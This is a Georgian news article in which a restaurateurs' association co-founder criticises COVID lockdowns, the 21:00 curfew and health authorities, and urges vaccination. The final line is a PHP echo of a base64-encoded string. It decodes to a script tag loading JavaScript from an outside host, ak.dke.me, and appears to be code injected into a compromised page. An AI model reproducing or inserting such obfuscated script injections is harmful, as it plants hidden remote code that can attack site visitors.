celsiusi
ავერსი საქკაბელი
“ის რაც ჩვენ ორჯერ გავიარეთ, თუ მესამედაც მოხდა სახელმწიფო ამას უბრალოდ ვერ გადაიტანს” , - ამის შესახებ საინფორმაციო სააგენტო BUSINESS TIME-ს “რესტორატორთა ასოციაციის” თანადამფუძნებელმა შოთა ბურჯანაძემ განუცხადა. 
 
როგორც ბურჯანაძე ამბობს, თუ ვაქცინაციის პროპაგანდა და მოხმარება რეალურად არ განვითარდა გახსნა-დაკეტვის რეალობა კვლავ გაგრძელდება. 
 
“სულ იქნება ასეთი კატა-თაგვობანას თამაში, ჩაკეტვა -გახსნა, დაინფიცირების რისკიც რჩება, ამიტომაც, ვაქცინაცია აუცილებელია და სახელმწიფომ ამ მიმართულებით აქტიურად უნდა იმუშაოს. სხვა შემთხვევაში, ის რაც ჩვენ ორჯერ გავიარეთ, თუ მესამედაც მოხდა სახელმწიფო ამას უბრალოდ ვერ გადაიტანს. არანაირი რესურსი აღარ არსებობს ვალის აღების, ეკონომიკის განვითარების, აქედან გამომდინარე, ჩაკეტვა უბრალოდ წარმოუდგენელია. სახელმწიფოს მიდგომა, დაავადებათა კონტროლის ცენტრის მიდგომა არ არის სისტემური. ჩვენ ვიღებთ სრულიად დაკეტვას ან სრულიად გახსნას, ამ ორ არჩევანს შორის ოქროს შუალედი არასდროს არ ხდება. რეგულაციების ფარგლებში უნდა მოხდეს გარკვეულწილად სფეროების მუშაობა სადაც ყველაზე მეტად პრევენციული ღონისძიებები იქნება გატარებული კოვიდ სიტუაციის შესამსუბუქებლად, მაგრამ ამას ჭირდება რა თქმა უნდა კომპეტენცია”,- აღნიშნა ბურჯანაძემ.
 
მისივე თქმით, მთავრობასთან კომუნიკაციის პრობლემა არ ყოფილა და არ არის, მაგრამ გადაწყვეტილების მხრივ განხორციელების პრობლემაა. რის გამოც ბიზნესი დიდ წნეხში ვარდება.
 
ბურჯანაძემ BUSINESS TIME-თან ასევე ისაუბრა იმ პრობლემებზე, რაც სფეროს კომენდანტის რეჯიმში მუშაობა უქმნის. 
“კითხვას თუ რა პრობლემებს გვიქმნის 21:00 საათამდე მუშაობა და შაბათ-კვირის გარეშე, საერთოდ ადამიანი ჩახედულიც რომ არ იყოს ამ სფეროში, რთულად ამოსაცნობი არ იქნება, რომ სარესტორნო ბიზნესი, კვების ობიექტები ამ რეჟიმით ნორმალურ მუშაობას ვერ შეძლებს. 21:00 საათამდე მუშაობა არ ნიშნავს 21:00-მდე მუშაობს, ვინაიდან ობიექტების თანამშრომლებს ჭირდებათ დრო სახლში წასასვლელად, ეს ნიშნავს 19:00 საათამდე 19:30-მდე მუშაობას. მოთხოვნები კომენდატის გადაწევასთან და ამ საკითხთან მიმართებაში ყოველდღიურ რეჟიმში გვაქვს კომუნიკაცია, მაგრამ სამწუხაროდ, კონსოლიდირებულად ეკონომიკური ჯგუფი და ჯანდაცვის სისტემა არ მუშაობს. ჯანდაცვის სისტემას პრობლემა აქვს, რომ ვერ გადაიტანენ დატვირთვას და ყველანაირი ბერკეტით ცდილობენ თავიდან აიცილონ კოვიდ ვითარების გართულება, თუნდაც ჩამოინგრეს მთელი ეკონომიკა და იმას ვერ ხვდებიან, რომ მათი ხელფასები ეკონომიკიდან მიდის“, - განმარტავს შოთა ბურჯანაძე. 
 
მისივე თქმით, ამ საკითხებზე სისტემური მიდგომა და კვალიფიცირებული ადამიანების ჩართულობაა საჭირო. 
 
“როცა კვალიფიცირებული ადამიანები გადაწყვეტენ როგორ და რანაირად იმოქმედონ და არა ისე თუ რა დაესიზმრება ამირან გამყრელიძეს და ღამით გამოაცხადებს გადაწყვეტილებას, მაგ შემთხვევაში შესაძლებელი იქნება სწორი გადაწყვეტილებებით გავიდეთ ფონს”,- განაცხადა ბურჯანაძემ.
 
 
 
1551
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");